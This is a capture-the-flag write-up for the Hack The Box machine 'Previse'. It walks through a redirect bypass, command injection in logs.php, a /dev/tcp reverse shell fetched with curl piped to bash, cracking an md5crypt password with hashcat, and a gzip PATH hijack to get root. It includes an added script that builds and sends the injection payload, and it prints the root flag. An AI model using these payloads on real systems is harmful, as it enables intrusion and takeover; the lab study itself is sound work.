Link: https://app.hackthebox.eu/machines/Previse

Enumeration

Port Scan

We have ssh open on port 22 and a web server on port 80.

Web Server

The web server takes us to a login page. Logging in with guessed credentials returns a generic Invalid Username or Password, so the error message does not tell us which half is wrong (no username enumeration from the login form). Looking at the headers, the response also sets a PHPSESSID cookie, so the backend is PHP, version unknown.

A gobuster scan just reveals the /css and /js directories with nothing interesting in them.

I attempted some directory traversal with ..%c0%af or %2e%2e%2f in place of ../, but neither worked.

I performed another gobuster scan for PHP files and found several:

One interesting file is nav.php. If we go to it, we can see a link for CREATE ACCOUNT.

Clicking it just returns a 302 back to the login page. I am going to try to intercept it with Burp Suite and see what we can do.

It turns out the 302 response already carries the full page body: the server issues the redirect but still renders the account page (presumably a redirect header with no exit behind it). If we intercept the response in Burp Suite and change the status line from 302 FOUND to 200 OK, the browser renders the page instead of following the redirect, and since the form's POST is handled the same way, the submission goes through:

I created a new account with user/pass of admin / admin and logged in.

In the FILES tab we can download SITEBACKUP.ZIP, which contains the full source code for all the PHP pages, many of which we found in the earlier gobuster scan.

Looking over the files, the most important ones are config.php, which holds the MySQL credentials, and logs.php.

Gaining Reverse Shell

snippet of code from logs.php

Now we can see that logs.php takes the delim parameter from the POST body and passes it straight into a shell command with no sanitization. Anything we put after a shell separator such as & in that value is run as a separate command by www-data.

I created a shell.sh file with the contents sh -i >& /dev/tcp/my.ip.here/4444 0>&1 (the /dev/tcp redirection is a bash feature, which is why the file is piped into bash rather than sh below) and started an nc listener with nc -lvnp 4444.

Next I started a Python web server with python3 -m http.server in the same directory as the shell script; it listens on port 8000 by default.

Finally, replay the POST to logs.php with the injected value, which fetches the script and pipes it into bash: delim=tab%26curl+http://my.ip.here:8000/shell.sh|bash. The %26 is a URL-encoded &, so PHP does not split it off as a new form field and the shell on the server sees tab & curl ... | bash.
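Here is an added shell example of the injection step, written for this page and not taken from the original post or from the box: it percent-encodes an arbitrary command, wraps it in the delim=tab&<command> shape the post uses, and POSTs it to logs.php with the session cookie. The target URL, session id and attacker address in the usage comment are placeholders, not values from the page.

```sh
#!/bin/sh
# Added example, not from the original post: build (and send) the logs.php
# command-injection payload. The delim parameter and the "tab&<command>" shape
# come from the post; the URL, session id and attacker address in the usage
# comment are placeholders you replace.

# Percent-encode every byte outside RFC 3986's unreserved set, so shell
# metacharacters such as & | ; and space reach logs.php intact instead of being
# parsed by PHP as form-field separators. Works byte by byte via od, so it is
# plain POSIX sh and locale-independent.
urlencode() {
    for hex in $(printf '%s' "$1" | od -An -tx1 -v); do
        case "$hex" in
            # 0-9, A-Z, a-z and - . _ ~ pass through unchanged
            3[0-9]|4[1-9a-f]|5[0-9a]|6[1-9a-f]|7[0-9a]|2d|2e|5f|7e)
                printf "\\$(printf '%03o' "$(( 0x$hex ))")" ;;
            *)
                printf '%%%s' "$(printf '%s' "$hex" | tr 'a-f' 'A-F')" ;;
        esac
    done
}

# Form body: the legitimate value "tab", then an encoded "&" that the server's
# shell treats as a command separator, then our command.
build_payload() {
    printf 'delim=tab%%26%s' "$(urlencode "$1")"
}

# POST the payload to logs.php with a valid session cookie; prints the HTTP status.
send_payload() {
    url="$1"; sessid="$2"; cmd="$3"
    curl -s -o /dev/null -w '%{http_code}\n' \
        -b "PHPSESSID=$sessid" \
        --data "$(build_payload "$cmd")" \
        "$url"
}

# Usage (placeholders): with "nc -lvnp 4444" listening and "python3 -m http.server"
# serving shell.sh on the attacking machine, run
#   send_payload http://previse.htb/logs.php 'your-PHPSESSID' \
#       'curl http://10.10.14.5:8000/shell.sh|bash'
```

The post's payload encodes the space as + and leaves | raw; both decode the same way in a form body, but encoding everything except unreserved characters avoids having to reason about which bytes PHP or the proxy will mangle.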

This gives us a shell for www-data:

Browsing around, we find user.txt in /home/m4lwhere, but the file is set up so that only m4lwhere can read it.

Now let’s take a step back and lay out what we know:

  • the website was created by m4lwhere
  • from the server status page we know there is one other admin
  • from the logs page we know the other admin is m4lwhere
  • from config.php we have the credentials for the MySQL server
  • finally, we have the salt from accounts.php: $1$🧂llol$

We need to get into the MySQL instance, pull the hashed password for m4lwhere, and crack it, hoping the same password is reused for his Linux account.

Gaining Access to m4lwhere

From the official MySQL documentation, we can connect to the server locally using the syntax:

mysql --user=user_name --password="pass" db_name

so we plug in the user, password and database name from config.php. Once connected, I first ran show tables; to see which tables exist, then selected everything from the accounts table:

dump the password for m4lwhere from mysql

For some reason nothing would display unless I exited and then reconnected.

Next, I saved the hash to a file named pass.txt and loaded it into hashcat:

hashcat -a 0 -m 500 pass.txt  /usr/share/wordlists/rockyou.txt
  • -a 0: straight (dictionary) attack
  • -m 500: md5crypt; comparing the hash against hashcat's list of example hashes, the $1$ prefix was the giveaway
  • pass.txt: the hashed password from the database
  • /usr/share/wordlists/rockyou.txt: a very common wordlist installed by default on Kali

After several minutes, we finally crack the hash!
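To confirm a cracked md5crypt password offline, and to see how the $1$salt$digest string hashcat mode 500 consumes is laid out, here is an added shell example that is not part of the original post. It splits the hash into its fields and recomputes it with openssl passwd -1, the same MD5-based crypt; the hash and password in the usage comment are constructed placeholders, not the box's values.

```sh
#!/bin/sh
# Added example, not from the original post: verify an md5crypt ($1$) hash
# against a candidate password using openssl's MD5-based crypt (the same
# algorithm hashcat mode 500 attacks). Any hash in the usage comment is constructed.

# Return 0 if "$2" is the password behind the md5crypt hash "$1",
# 1 if it is not, 2 if the string is not an md5crypt hash at all.
md5crypt_check() {
    hash="$1"
    candidate="$2"
    case "$hash" in
        '$1$'*'$'*) ;;                       # must look like $1$<salt>$<digest>
        *) echo "not an md5crypt hash: $hash" >&2; return 2 ;;
    esac
    # Fields are '$'-separated: "" "1" "<salt>" "<digest>"; the salt is at most 8 bytes
    salt=$(printf '%s' "$hash" | cut -d '$' -f 3)
    # Recompute with the same salt; openssl prints "$1$<salt>$<digest>"
    recomputed=$(openssl passwd -1 -salt "$salt" "$candidate")
    [ "$recomputed" = "$hash" ]
}

# Read "hash:password" lines, as hashcat --show prints them, and report
# which recovered passwords really reproduce their hash.
confirm_show_output() {
    while IFS= read -r line; do
        h=${line%%:*}         # up to the first ':' is the hash (it contains no ':')
        p=${line#*:}          # the rest is the recovered password
        if md5crypt_check "$h" "$p"; then
            printf 'OK   %s\n' "$h"
        else
            printf 'FAIL %s\n' "$h"
        fi
    done
}

# Usage (constructed values):
#   printf '%s:%s\n' "$(openssl passwd -1 -salt saltsalt 'Passw0rd!')" 'Passw0rd!' | confirm_show_output
```

One detail worth noticing about the salt seen in accounts.php: md5crypt works on raw bytes and uses at most 8 of them, and 🧂 is four bytes in UTF-8, so 🧂llol is exactly the maximum-length salt; the emoji changes nothing about how the hash is cracked.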

I tried the cracked password over ssh and it works! I went ahead and closed the old netcat reverse shell, since we now have credentials to access the box directly over ssh. Now we can grab the user.txt flag!

Privilege Escalation

Finally we need root privileges for the last flag. The first thing I like to do is check what we can run with sudo using sudo -l.

The only thing we can run is /opt/scripts/access_backup.sh:

The script calls gzip by its bare name rather than /bin/gzip, so the binary is resolved through PATH. If we put a directory we control at the front of PATH and drop our own gzip there, the script runs ours as root. This only works if sudo hands our PATH through to the script; if the Matching Defaults lines of sudo -l include secure_path, the real gzip would be found there instead.

# first let's put our home directory at the front of PATH
$ PATH=/home/m4lwhere:$PATH
$ export PATH

# now create a reverse shell disguised as gzip, the command the script above runs as root
# (same reverse shell as before; the shebang makes sure bash, not sh, interprets /dev/tcp)
$ printf '#!/bin/bash\nsh -i >& /dev/tcp/my.ip.here/4444 0>&1\n' > gzip
$ chmod +x gzip

# on our attacking machine, start the nc listener again
$ nc -lvnp 4444

# back on the target, run the script with sudo; the first gzip found in PATH is ours
$ sudo /opt/scripts/access_backup.sh

# a connection should arrive on the nc listener; run
$ whoami
root

# grab the flag!
$ cat /root/root.txt
0750ebb5cc0e87b90dea8bcf0686e54b
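Here is an added, unprivileged shell demonstration of the mechanism, written for this page and not taken from the original post or from the box. It constructs, in a temp directory, a stand-in for access_backup.sh that calls gzip by bare name, a hardened variant that resets PATH first, and a fake gzip that only reports that it ran; nothing executes as root, and the scripts are constructed, not the box's real files.

```sh
#!/bin/sh
# Added example, not from the original post: a local, unprivileged demo of the
# PATH hijack used against access_backup.sh. The scripts below are constructed
# stand-ins, not the box's real files, and nothing runs as root.

# Create a temp dir holding:
#   backup_vuln.sh      calls gzip by bare name (like access_backup.sh)
#   backup_hardened.sh  resets PATH to trusted dirs before calling gzip
#   fakebin/gzip        our "malicious" gzip; it only reports that it ran
make_scripts() {
    work=$(mktemp -d)
    mkdir -p "$work/fakebin"

    cat > "$work/backup_vuln.sh" <<'EOF'
#!/bin/sh
# gzip is resolved through $PATH, so whoever controls PATH controls which binary runs
gzip --version 2>&1
EOF

    cat > "$work/backup_hardened.sh" <<'EOF'
#!/bin/sh
# reset PATH before calling anything by bare name; calling /bin/gzip by absolute
# path is the equivalent fix (assumes gzip lives in /usr/bin or /bin)
PATH=/usr/bin:/bin
export PATH
gzip --version 2>&1
EOF

    cat > "$work/fakebin/gzip" <<'EOF'
#!/bin/sh
# stand-in for the reverse shell: prove we were executed, and by whom
echo "hijacked gzip ran as $(id -un)"
EOF

    chmod +x "$work/backup_vuln.sh" "$work/backup_hardened.sh" "$work/fakebin/gzip"
    echo "$work"
}

# Run script "$2" from dir "$1" with our fake directory at the front of PATH, the
# same way "PATH=/home/m4lwhere:$PATH sudo /opt/scripts/access_backup.sh" does on
# the box (there it only matters if sudo does not override PATH via secure_path).
run_with_hijacked_path() {
    PATH="$1/fakebin:$PATH" "$1/$2" || true
}

# Return 0 if running script "$2" from dir "$1" executed our fake gzip.
hijacked() {
    case "$(run_with_hijacked_path "$1" "$2")" in
        *"hijacked gzip ran as"*) return 0 ;;
        *) return 1 ;;
    esac
}

# Usage:
#   w=$(make_scripts)
#   hijacked "$w" backup_vuln.sh && echo "vulnerable script ran our gzip"
#   hijacked "$w" backup_hardened.sh || echo "hardened script did not"
#   rm -rf "$w"
```

The hardened script shows the two real fixes for this class of bug: call privileged helpers by absolute path, or reset PATH (or let sudo's secure_path do it) before calling anything by name.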

Conclusion

Overall, the concepts of this box were not very difficult. Changing 302 Found to 200 OK was a clever trick that took me some searching to discover. The PATH hijack, and using the source code to find the command injection, were fairly straightforward. Fun box!
